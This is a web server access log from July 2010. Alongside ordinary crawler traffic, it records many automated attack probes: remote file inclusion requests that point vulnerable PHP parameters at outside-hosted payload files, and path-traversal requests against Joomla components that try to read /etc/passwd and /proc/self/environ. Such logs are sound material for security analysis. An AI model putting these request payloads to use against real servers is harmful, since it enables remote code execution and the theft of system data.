76.13.114.107 - - [20/Jul/2010:06:45:42 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
64.207.204.37 - - [20/Jul/2010:06:48:39 -0700] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.myjpconnelly.com/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
64.207.204.37 - - [20/Jul/2010:06:48:39 -0700] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.myjpconnelly.com/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
76.13.123.195 - - [20/Jul/2010:07:04:12 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
61.221.117.244 - - [20/Jul/2010:07:12:43 -0700] "GET /logs/access.log%20%20///skin/ggambo7002_board/comment_modify.php?dir=http://www.net-games.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
61.221.117.244 - - [20/Jul/2010:07:12:43 -0700] "GET //skin/ggambo7002_board/comment_modify.php?dir=http://www.net-games.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
61.221.117.244 - - [20/Jul/2010:07:12:43 -0700] "GET /logs///skin/ggambo7002_board/comment_modify.php?dir=http://www.net-games.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
61.221.117.244 - - [20/Jul/2010:07:12:49 -0700] "GET /logs///skin/ggambo7002_board/comment_modify.php?dir=http://www.net-games.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
61.221.117.244 - - [20/Jul/2010:07:12:49 -0700] "GET //skin/ggambo7002_board/comment_modify.php?dir=http://www.net-games.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
61.221.117.244 - - [20/Jul/2010:07:12:49 -0700] "GET /logs/access.log%20%20///skin/ggambo7002_board/comment_modify.php?dir=http://www.net-games.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
78.41.204.220 - - [20/Jul/2010:07:30:48 -0700] "GET /logs/error.php?dir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.redneckmba.com"
78.41.204.220 - - [20/Jul/2010:07:30:48 -0700] "GET /error.php?dir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.redneckmba.com"
64.207.204.37 - - [20/Jul/2010:07:33:28 -0700] "GET /logs/access.log////skin/ggambo7002_board/comment_modify.php?dir=http://www.myjpconnelly.com/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
64.207.204.37 - - [20/Jul/2010:07:33:28 -0700] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.myjpconnelly.com/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
64.207.204.37 - - [20/Jul/2010:07:33:28 -0700] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.myjpconnelly.com/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
64.207.204.37 - - [20/Jul/2010:07:33:33 -0700] "GET /logs/access.log////skin/ggambo7002_board/comment_modify.php?dir=http://www.myjpconnelly.com/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
64.207.204.37 - - [20/Jul/2010:07:33:33 -0700] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.myjpconnelly.com/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
64.207.204.37 - - [20/Jul/2010:07:33:33 -0700] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.myjpconnelly.com/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
207.46.13.138 - - [20/Jul/2010:07:47:14 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.redneckmba.com"
207.46.13.138 - - [20/Jul/2010:07:49:17 -0700] "GET /tmp/?N=A HTTP/1.1" 200 520 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.redneckmba.com"
66.163.171.207 - - [20/Jul/2010:07:59:07 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.114.105 - - [20/Jul/2010:08:15:45 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.123.195 - - [20/Jul/2010:09:16:59 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
66.163.171.207 - - [20/Jul/2010:09:38:56 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
64.207.204.37 - - [20/Jul/2010:09:55:45 -0700] "GET /logs/access.log/index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
64.207.204.37 - - [20/Jul/2010:09:55:45 -0700] "GET /index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
64.207.204.37 - - [20/Jul/2010:09:55:45 -0700] "GET /logs/index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
74.55.73.74 - - [20/Jul/2010:09:57:04 -0700] "GET /index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.redneckmba.com"
81.21.78.22 - - [20/Jul/2010:09:57:54 -0700] "GET /index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
216.129.119.47 - - [20/Jul/2010:09:58:04 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "redneckmba.com"
77.240.118.133 - - [20/Jul/2010:09:58:08 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.814" "www.redneckmba.com"
77.240.118.133 - - [20/Jul/2010:09:58:31 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.814" "www.redneckmba.com"
77.240.118.133 - - [20/Jul/2010:09:59:30 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.814" "www.redneckmba.com"
74.55.73.74 - - [20/Jul/2010:10:00:42 -0700] "GET /logs/access.log/index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.redneckmba.com"
74.55.73.74 - - [20/Jul/2010:10:00:42 -0700] "GET /index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.redneckmba.com"
74.55.73.74 - - [20/Jul/2010:10:00:42 -0700] "GET /logs/index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.redneckmba.com"
77.240.118.133 - - [20/Jul/2010:10:00:58 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.814" "www.redneckmba.com"
81.21.78.22 - - [20/Jul/2010:10:01:12 -0700] "GET /logs/access.log/index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
81.21.78.22 - - [20/Jul/2010:10:01:12 -0700] "GET /index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
81.21.78.22 - - [20/Jul/2010:10:01:12 -0700] "GET /logs/index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
77.240.118.133 - - [20/Jul/2010:10:02:15 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.814" "www.redneckmba.com"
76.13.114.107 - - [20/Jul/2010:10:02:47 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
77.240.118.133 - - [20/Jul/2010:10:02:52 -0700] "GET /logs/access.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.814" "www.redneckmba.com"
77.240.118.133 - - [20/Jul/2010:10:02:52 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.814" "www.redneckmba.com"
77.240.118.133 - - [20/Jul/2010:10:02:52 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.814" "www.redneckmba.com"
77.240.118.133 - - [20/Jul/2010:10:03:07 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.814" "www.redneckmba.com"
77.240.118.133 - - [20/Jul/2010:10:03:33 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.814" "redneckmba.com"
77.240.118.133 - - [20/Jul/2010:10:04:24 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.814" "www.redneckmba.com"
77.240.118.133 - - [20/Jul/2010:10:04:31 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.814" "redneckmba.com"
77.240.118.133 - - [20/Jul/2010:10:05:09 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.814" "www.redneckmba.com"
77.240.118.133 - - [20/Jul/2010:10:05:14 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.814" "redneckmba.com"
77.240.118.133 - - [20/Jul/2010:10:05:18 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.814" "redneckmba.com"
77.240.118.133 - - [20/Jul/2010:10:06:24 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.814" "www.redneckmba.com"
77.240.118.133 - - [20/Jul/2010:10:06:56 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.814" "www.redneckmba.com"
80.48.73.1 - - [20/Jul/2010:10:28:19 -0700] "GET /logs//index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
80.48.73.1 - - [20/Jul/2010:10:28:19 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
62.109.183.51 - - [20/Jul/2010:10:32:18 -0700] "GET /index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.redneckmba.com"
62.109.183.51 - - [20/Jul/2010:10:34:06 -0700] "GET /logs/access.log//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.redneckmba.com"
62.109.183.51 - - [20/Jul/2010:10:34:06 -0700] "GET /index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.redneckmba.com"
62.109.183.51 - - [20/Jul/2010:10:34:07 -0700] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.redneckmba.com"
208.80.193.39 - - [20/Jul/2010:10:37:47 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SIMBAR={454EB3AB-C8F0-4c92-8A9A-F59DC2F5E896}; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322)" "www.redneckmba.com"
88.191.228.166 - - [20/Jul/2010:10:43:45 -0700] "GET /logs/access.log//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://aconnect.ru/shop-script-premium-rus/data/osyid.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.redneckmba.com"
88.191.228.166 - - [20/Jul/2010:10:43:45 -0700] "GET /kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://aconnect.ru/shop-script-premium-rus/data/osyid.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.redneckmba.com"
88.191.228.166 - - [20/Jul/2010:10:43:45 -0700] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://aconnect.ru/shop-script-premium-rus/data/osyid.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.redneckmba.com"
93.158.149.32 - - [20/Jul/2010:10:46:25 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.redneckmba.com"
113.11.200.195 - - [20/Jul/2010:10:51:39 -0700] "GET /logs/access.log//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
113.11.200.195 - - [20/Jul/2010:10:51:40 -0700] "GET /index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
113.11.200.195 - - [20/Jul/2010:10:51:41 -0700] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
91.206.218.32 - - [20/Jul/2010:11:09:11 -0700] "GET /send_reminders.php?includedir=http://www.votrepharma.com/images/banners/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
91.206.218.32 - - [20/Jul/2010:11:09:11 -0700] "GET /logs/send_reminders.php?includedir=http://www.votrepharma.com/images/banners/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
91.206.218.32 - - [20/Jul/2010:11:09:14 -0700] "GET /logs/access.log/send_reminders.php?includedir=http://www.votrepharma.com/images/banners/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
121.1.130.140 - - [20/Jul/2010:11:13:07 -0700] "GET /logs/send_reminders.php?includedir=http://www.votrepharma.com/images/banners/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
91.206.218.32 - - [20/Jul/2010:11:16:36 -0700] "GET /logs/access.log%20%20/send_reminders.php?includedir=http://www.votrepharma.com/images/banners/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
91.206.218.32 - - [20/Jul/2010:11:16:36 -0700] "GET /logs/send_reminders.php?includedir=http://www.votrepharma.com/images/banners/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
91.206.218.32 - - [20/Jul/2010:11:16:36 -0700] "GET /send_reminders.php?includedir=http://www.votrepharma.com/images/banners/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
66.163.171.205 - - [20/Jul/2010:11:36:55 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
207.46.199.200 - - [20/Jul/2010:11:40:50 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.redneckmba.com"
222.236.47.182 - - [20/Jul/2010:11:54:50 -0700] "GET /http://www.britak.co.ke//images/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "redneckmba.com"
76.13.123.194 - - [20/Jul/2010:12:06:04 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.114.107 - - [20/Jul/2010:12:10:42 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
208.80.193.39 - - [20/Jul/2010:12:37:21 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; {7BD48EC9-F271-E440-BBC7-66A8CC02F2EE}; .NET CLR 1.1.4322; ZangoToolbar 4.8.3)" "redneckmba.com"
207.46.12.25 - - [20/Jul/2010:12:40:59 -0700] "GET /tmp/?S=A HTTP/1.0" 200 504 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SLCC1; .NET CLR 1.1.4322; .NET CLR 2.0.40607; .NET CLR 3.0.04506.648)" "www.redneckmba.com"
74.55.73.74 - - [20/Jul/2010:12:50:08 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.myjpconnelly.com/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.redneckmba.com"
74.55.73.74 - - [20/Jul/2010:12:50:08 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.myjpconnelly.com/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.redneckmba.com"
66.223.18.108 - - [20/Jul/2010:12:51:57 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.myjpconnelly.com/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.64" "www.redneckmba.com"
66.223.18.108 - - [20/Jul/2010:12:51:57 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.myjpconnelly.com/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.64" "www.redneckmba.com"
222.236.47.182 - - [20/Jul/2010:12:57:57 -0700] "GET /logs/access_100607.log/http://www.britak.co.ke//images/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "redneckmba.com"
222.236.47.182 - - [20/Jul/2010:12:57:58 -0700] "GET /http://www.britak.co.ke//images/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "redneckmba.com"
222.236.47.182 - - [20/Jul/2010:12:58:09 -0700] "GET /logs/http://www.britak.co.ke//images/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "redneckmba.com"
173.203.51.205 - - [20/Jul/2010:13:02:03 -0700] "GET / HTTP/1.1" 200 779 "-" "Flight Deck Bot 1.3 beta (http://www.flightdeckreports.com/bot)" "www.redneckmba.com"
200.103.187.57 - - [20/Jul/2010:13:45:57 -0700] "GET /logs//admin.remository.php?mosConfig_absolute_path=http://h1.ripway.com/fufuck/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.redneckmba.com"
200.103.187.57 - - [20/Jul/2010:13:46:00 -0700] "GET /admin.remository.php?mosConfig_absolute_path=http://h1.ripway.com/fufuck/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.redneckmba.com"
66.163.171.205 - - [20/Jul/2010:13:48:21 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.114.107 - - [20/Jul/2010:14:44:49 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
125.141.91.138 - - [20/Jul/2010:15:09:25 -0700] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
125.141.91.138 - - [20/Jul/2010:15:09:25 -0700] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
125.141.91.138 - - [20/Jul/2010:15:09:25 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
125.141.91.138 - - [20/Jul/2010:15:09:59 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
125.141.91.138 - - [20/Jul/2010:15:10:00 -0700] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
125.141.91.138 - - [20/Jul/2010:15:10:00 -0700] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
119.192.145.134 - - [20/Jul/2010:15:10:01 -0700] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
119.192.145.134 - - [20/Jul/2010:15:10:01 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
119.192.145.134 - - [20/Jul/2010:15:10:02 -0700] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.98.130.112 - - [20/Jul/2010:15:11:05 -0700] "GET /admin/auth.php?xcart_dir=http://www.schoenheim.de/e107_handlers/search/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
87.98.130.112 - - [20/Jul/2010:15:11:05 -0700] "GET /admin/auth.php?xcart_dir=http://solidarcled.com/ijlji/e107.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
87.98.130.112 - - [20/Jul/2010:15:11:05 -0700] "GET /admin/auth.php?xcart_dir=http://www.schoenheim.de/e107_handlers/search/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
87.98.130.112 - - [20/Jul/2010:15:14:02 -0700] "GET /admin/auth.php?xcart_dir=http://www.schoenheim.de/e107_handlers/search/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "redneckmba.com"
87.98.130.112 - - [20/Jul/2010:15:14:02 -0700] "GET /admin/auth.php?xcart_dir=http://solidarcled.com/ijlji/e107.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "redneckmba.com"
87.98.130.112 - - [20/Jul/2010:15:14:02 -0700] "GET /admin/auth.php?xcart_dir=http://www.schoenheim.de/e107_handlers/search/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "redneckmba.com"
87.98.130.112 - - [20/Jul/2010:15:16:25 -0700] "GET /logs/access.log//admin/auth.php?xcart_dir=http://solidarcled.com/ijlji/e107.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
87.98.130.112 - - [20/Jul/2010:15:16:25 -0700] "GET /admin/auth.php?xcart_dir=http://solidarcled.com/ijlji/e107.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
87.98.130.112 - - [20/Jul/2010:15:16:25 -0700] "GET /logs//admin/auth.php?xcart_dir=http://solidarcled.com/ijlji/e107.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
87.98.130.112 - - [20/Jul/2010:15:16:42 -0700] "GET /logs/access.log//admin/auth.php?xcart_dir=http://www.schoenheim.de/e107_handlers/search/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
87.98.130.112 - - [20/Jul/2010:15:16:43 -0700] "GET /admin/auth.php?xcart_dir=http://www.schoenheim.de/e107_handlers/search/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
87.98.130.112 - - [20/Jul/2010:15:16:43 -0700] "GET /logs//admin/auth.php?xcart_dir=http://www.schoenheim.de/e107_handlers/search/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
87.98.130.112 - - [20/Jul/2010:15:16:48 -0700] "GET /logs/access.log//admin/auth.php?xcart_dir=http://www.schoenheim.de/e107_handlers/search/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
87.98.130.112 - - [20/Jul/2010:15:16:48 -0700] "GET /admin/auth.php?xcart_dir=http://www.schoenheim.de/e107_handlers/search/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
87.98.130.112 - - [20/Jul/2010:15:16:48 -0700] "GET /logs//admin/auth.php?xcart_dir=http://www.schoenheim.de/e107_handlers/search/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
125.141.91.138 - - [20/Jul/2010:15:18:02 -0700] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
125.141.91.138 - - [20/Jul/2010:15:18:02 -0700] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
125.141.91.138 - - [20/Jul/2010:15:18:02 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
119.192.145.134 - - [20/Jul/2010:15:18:06 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
119.192.145.134 - - [20/Jul/2010:15:18:06 -0700] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
119.192.145.134 - - [20/Jul/2010:15:18:06 -0700] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
125.141.91.138 - - [20/Jul/2010:15:18:32 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
125.141.91.138 - - [20/Jul/2010:15:18:32 -0700] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
